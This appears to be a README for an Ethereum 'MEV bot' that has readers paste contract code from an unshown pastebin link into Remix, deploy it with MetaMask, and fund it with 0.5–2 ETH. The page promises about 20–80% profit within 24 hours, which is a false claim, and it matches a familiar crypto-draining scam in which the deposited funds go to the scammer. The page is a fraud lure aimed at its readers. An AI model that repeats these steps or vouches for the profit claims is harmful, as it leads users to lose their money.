The tool allows users to create and manage MEV bots (Maximal Extractable Value bots) based on smart contracts. Users can connect their MetaMask cryptocurrency wallets, create contracts, and run scripts to automate trading and other operations on the Ethereum blockchain.
⚠️ The bot operates entirely within the browser, so there is no need to download any programs that could potentially be harmful to your computer.
Key Features
-
Wallet Connection: Supports MetaMask.
-
Contract Creation: Users can create smart contracts using our tool.
-
Script Execution: The website allows users to execute the created contract and manage its execution.
-
Real-time Transaction Display: The bot's transactions are displayed in real-time.
Usage
-
Download MetaMask (if you don’t have it already)
-
Access to Remix Ethereum IDE.
For the Remix IDE you can follow this steps:
-
Click on the
contracts
folder and then createNew File
. Rename it as you like, for example:bot.sol
Note: If there is a problem if the text is not colored when you create bot.sol and paste the code from pastebin, try again. If the codes are not colored, you cannot proceed to the next step.
-
Paste this sourcecode code in Remix.
-
Go to the
Solidity Compiler
tab, select version0.6.6+commit.6c089d02
and clickCompile bot.sol
.Make sure
bot.sol
is selected in the CONTRACT section of the SOLIDITY COMPILER section. -
TGo to the
DEPLOY & RUN TRANSACTIONS
tab, select theInjected Provider - Metamask
environment and thenDeploy
. By approving the Metamask contract creation fee, you will have created your own contract (ignore any IFPS errors that may appear afterwards). -
Copy your newly created contract address and fund it with any amount of ETH (at least 0.5-2 ETH or more is recommended) Simply send ETH to your newly created contract address to allow the bot to earn money.
-
After your transaction is confirmed, click the “start” button to run the bot. Withdraw your ETH at any time by clicking the “Withdraw” button.
That’s it. The bot will start working immediately earning you profits from arbitrage trades on Uniswap pools.
Testing the bot's operation over 24 hours yields ~20-80% profit on the balance.
The profit depends on network load (gas price) and competition from other MEV bots on the token.
Bot Balance Chart
License
This project is licensed under the MIT License. See the LICENSE file for details.
评论 (0)